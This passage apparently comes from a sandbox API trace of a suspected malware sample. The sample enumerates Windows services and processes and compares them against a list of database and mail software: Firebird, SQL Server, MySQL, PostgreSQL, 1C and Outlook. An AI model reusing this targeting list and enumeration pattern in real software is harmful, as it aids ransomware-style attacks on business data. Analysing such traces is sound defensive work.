(lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0275.890] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0275.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0275.890] lstrlenW (lpString="SamSs") returned 5 [0275.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0275.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0275.890] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0275.890] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0275.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0275.890] lstrlenW (lpString="Schedule") returned 8 [0275.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0275.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0275.890] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0275.890] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0275.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0275.890] lstrlenW (lpString="SENS") returned 4 [0275.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0275.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0275.890] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0275.890] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0275.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0275.890] lstrlenW (lpString="ShellHWDetection") returned 16 [0275.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0275.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0275.890] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0275.890] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0275.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0275.891] lstrlenW (lpString="Spooler") returned 7 [0275.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0275.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0275.891] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0275.891] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0275.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0275.891] lstrlenW (lpString="SysMain") returned 7 [0275.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0275.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0275.891] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0275.891] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0275.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0275.891] lstrlenW (lpString="Themes") returned 6 [0275.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0275.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0275.891] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0275.891] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0275.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0275.891] lstrlenW (lpString="TrkWks") returned 6 [0275.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0275.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0275.891] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0275.891] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0275.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0275.891] lstrlenW (lpString="UxSms") returned 5 [0275.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0275.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0275.891] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0275.891] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0275.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0275.891] lstrlenW (lpString="Winmgmt") returned 7 [0275.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0275.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0275.892] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0275.892] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0275.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0275.892] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0275.892] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d8 [0275.893] Process32FirstW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.893] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0275.893] lstrlenW (lpString="System") returned 6 [0275.893] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0275.893] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0275.893] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0275.893] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0275.893] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0275.893] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0275.893] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0275.893] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0275.894] lstrlenW (lpString="smss.exe") returned 8 [0275.894] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0275.894] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0275.894] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0275.894] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0275.894] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0275.894] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0275.894] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0275.894] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.894] lstrlenW (lpString="csrss.exe") returned 9 [0275.894] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0275.894] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0275.894] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0275.894] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0275.894] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0275.894] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0275.894] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0275.894] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0275.895] lstrlenW (lpString="wininit.exe") returned 11 [0275.895] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0275.895] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0275.895] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0275.895] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0275.895] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0275.895] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0275.895] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0275.895] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.895] lstrlenW (lpString="csrss.exe") returned 9 [0275.895] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0275.895] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0275.895] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0275.895] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0275.895] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0275.895] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0275.895] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0275.895] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0275.895] lstrlenW (lpString="winlogon.exe") returned 12 [0275.895] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0275.896] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0275.896] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0275.896] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0275.896] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0275.896] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0275.896] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0275.896] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0275.896] lstrlenW (lpString="services.exe") returned 12 [0275.896] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0275.896] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0275.896] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0275.896] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0275.896] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0275.896] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0275.896] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0275.896] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0275.896] lstrlenW (lpString="lsass.exe") returned 9 [0275.896] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0275.896] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0275.896] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0275.897] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0275.897] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0275.897] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0275.897] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0275.897] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0275.897] lstrlenW (lpString="lsm.exe") returned 7 [0275.897] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0275.897] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0275.897] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0275.897] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0275.897] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0275.897] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0275.897] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0275.897] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.897] lstrlenW (lpString="svchost.exe") returned 11 [0275.897] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0275.897] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0275.897] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0275.897] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0275.897] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0275.898] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0275.898] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.898] lstrlenW (lpString="svchost.exe") returned 11 [0275.898] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.898] lstrlenW (lpString="svchost.exe") returned 11 [0275.898] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.898] lstrlenW (lpString="svchost.exe") returned 11 [0275.898] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.899] lstrlenW (lpString="svchost.exe") returned 11 [0275.899] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0275.899] lstrlenW (lpString="audiodg.exe") returned 11 [0275.899] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.899] lstrlenW (lpString="svchost.exe") returned 11 [0275.899] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.900] lstrlenW (lpString="svchost.exe") returned 11 [0275.900] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0275.900] lstrlenW (lpString="userinit.exe") returned 12 [0275.900] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0275.900] lstrlenW (lpString="dwm.exe") returned 7 [0275.900] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0275.900] lstrlenW (lpString="explorer.exe") returned 12 [0275.900] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0275.901] lstrlenW (lpString="spoolsv.exe") returned 11 [0275.901] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0275.901] lstrlenW (lpString="taskhost.exe") returned 12 [0275.901] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.901] lstrlenW (lpString="svchost.exe") returned 11 [0275.901] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0275.901] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0275.902] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0275.902] lstrlenW (lpString="reader_sl.exe") returned 13 [0275.902] Process32NextW (in: hSnapshot=0x3d8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0275.902] CloseHandle (hObject=0x3d8) returned 1 [0275.902] Sleep (dwMilliseconds=0x1f4) [0276.595] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0276.816] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0276.817] GetLastError () returned 0xea [0276.817] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe90) returned 0x3dec5a0 [0276.817] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xe90, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0276.817] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0276.817] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0276.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0276.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0276.817] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0276.817] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0276.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0276.817] lstrlenW (lpString="AudioSrv") returned 8 [0276.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0276.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0276.817] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0276.817] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0276.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0276.817] lstrlenW (lpString="BFE") returned 3 [0276.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0276.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0276.817] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0276.817] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0276.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0276.817] lstrlenW (lpString="CryptSvc") returned 8 [0276.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0276.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0276.818] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0276.818] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0276.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0276.818] lstrlenW (lpString="CscService") returned 10 [0276.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0276.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0276.818] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0276.818] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0276.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0276.818] lstrlenW (lpString="DcomLaunch") returned 10 [0276.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0276.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0276.818] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0276.818] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0276.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0276.818] lstrlenW (lpString="Dhcp") returned 4 [0276.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0276.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0276.818] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0276.818] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0276.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0276.818] lstrlenW (lpString="Dnscache") returned 8 [0276.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0276.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0276.818] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0276.818] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0276.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0276.818] lstrlenW (lpString="DPS") returned 3 [0276.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0276.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0276.818] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0276.819] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0276.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0276.819] lstrlenW (lpString="eventlog") returned 8 [0276.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0276.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0276.819] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0276.819] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0276.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0276.819] lstrlenW (lpString="EventSystem") returned 11 [0276.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0276.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0276.819] 